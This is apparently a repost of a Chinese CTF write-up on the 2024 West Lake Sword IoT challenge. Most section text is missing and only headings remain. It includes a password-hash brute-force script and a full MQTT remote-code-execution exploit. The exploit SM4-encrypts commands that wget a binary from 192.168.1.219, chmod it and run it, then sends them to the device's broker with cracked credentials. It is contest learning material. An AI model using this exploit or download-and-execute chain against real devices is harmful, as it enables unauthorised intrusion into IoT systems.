一
前言
二
大致的题目以及分数分布
三
1~5题目分析
(1)分析复位按钮
(2)分析flash型号
(3)分析波特率
(4)8888端口服务分析
(5)xxx端口密码爆破
xhlj2024:$6$pvCQQygWXp04MJao$aYIMt03T2goWCa6JLX7QY6/p4C3lUzGZIUueePaHibbiihShFGufRHXzhCEeVGW4u7o39DCUEeTPASKH/0N6mQ==
import hashlib
import base64
# 目标哈希值(Base64解码前的字符串)
target_hash_base64 = "aYIMt03T2goWCa6JLX7QY6/p4C3lUzGZIUueePaHibbiihShFGufRHXzhCEeVGW4u7o39DCUEeTPASKH/0N6mQ=="
# 将Base64编码的目标哈希值解码为十六进制
target_hash = base64.b64decode(target_hash_base64).hex()
print(target_hash)
# 盐值
salt = base64.b64decode("pvCQQygWXp04MJao")
# 哈希函数,这里使用SHA-512,并且考虑了盐值
def hash_password(password, salt):
return hashlib.sha512((password).encode()+salt).hexdigest()
print(hash_password(str('0123456').rjust(7,'0'), salt))
# 尝试所有7位数字的密码
for password in range(0, 10000000):
if hash_password(str(password).rj ust(7,'0'), salt) == target_hash:
print(f"找到密码:{password}")
break
else:
print("没有找到匹配的密码。")
四
关于固件dump的研究
五
关于mqtt的rce的研究
{"log":1,"timestamp":"xxxx","info":"xxxx"}
aa-bb-cc:dd:ee
aa为标准月份格式
bb为标准天数格式
cc dd ee分别为标准时 分 秒格式
wget http://192.168.1.219:9/z
chmod +x /z
/z
import time
import struct
import base64
import paho.mqtt.client as mqtt
from gmssl.sm4 import CryptSM4, SM4_ENCRYPT, SM4_DECRYPT
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected to MQTT Broker!")
else:
print("Failed to connect, return code %dn", rc)
def pack_key(v24):
key_bytes = b''
for i in range(4):
key_bytes += struct.pack('<I', v24[i]) # 使用小端序打包每个整数
return key_bytes
def encode_sm4(value,key):
"""
SM4 加密
:value: python各数据格式
"""
crypt_sm4 = CryptSM4()
crypt_sm4.set_key(key, SM4_ENCRYPT)
# 使用crypt_ecb进行加密value
encrypt_value = crypt_sm4.crypt_ecb(value)
return encrypt_value
def decode_sm4(value,key):
crypt_sm4 = CryptSM4()
crypt_sm4.set_key(key, SM4_DECRYPT)
decrypt_value = crypt_sm4.crypt_ecb(value)
return decrypt_value
def get_input(command):
v24 = [0x9845DC01, 0x10CD5489, 0x67BA23FE, 0xEF32AB76]
key_bytes = pack_key(v24)
## --generate input--
test_key = key_bytes
cmd = b'"n'
cmd += command
cmd += b'n'
cmd = cmd.ljust(0x20,b"a")
#print(test_key)
#print(b"cmd:"+cmd)
#print("len_cmd:"+str(len(cmd)))
sm4_encode = encode_sm4(cmd,test_key)
#print(b"sm4_encode:"+sm4_encode)
#print("len_sm4_encode:"+str(len(sm4_encode)))
if len(sm4_encode) > 0x30 :
print("len_sm4_encode:"+str(len(sm4_encode)))
print("[+]erro:encode_sm4_string is too long!")
exit(0)
#print(sm4_encode[:32])
#print(decode_sm4(sm4_encode,test_key))
after_base64_decode = b"xbf"+sm4_encode
mos_input = base64.b64encode(after_base64_decode)
#print(b"input:"+mos_input)
#print("len_input:"+str(len(mos_input)))
if (len(mos_input) & 3) :
print("len_input:"+str(len(mos_input)))
print("[+]erro:input len & 3 != 0")
exit(0)
return mos_input
if __name__ == "__main__":
cmd1 = b'wget http://192.168.1.219:9/z'
cmd2 = b'chmod +x /z'
cmd3 = b'/z'
#cmd1 = b'mkdir /tmp/nameless'
input1 = get_input(cmd1).decode()
input2 = get_input(cmd2).decode()
input3 = get_input(cmd3).decode()
print("[+]input1:"+input1)
print("[+]input2:"+input2)
print("[+]input3:"+input3)
p1 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input1+'"}'
p2 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input2+'"}'
p3 = '{"log":1,"timestamp":"11-11-11:11:11","info":'+'"'+input3+'"}'
print(p1)
print(p2)
print(p3)
## --try rce by mqtt--
client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
client.username_pw_set(username="xhlj2024", password="2758934")
client.on_connect = on_connect
client.connect("192.168.1.1", 8888)
topic = "logs"
client.publish(topic, p1)
time.sleep(2)
client.publish(topic,p2)
time.sleep(2)
client.publish(topic,p3)
time.sleep(2)
client.disconnect()
六
RCE后的赛题分析
(7)5679端口号服务
七
总结
看雪ID:Nameless_a
https://bbs.kanxue.com/user-home-943085.htm
# 往期推荐
1、Hypervisor From Scratch:设置我们的第一个虚拟机
球分享
球点赞
球在看
点击阅读原文查看更多
原文始发于微信公众号(看雪学苑):西湖论剑2024 IOT赛后复盘及mqtt rce详解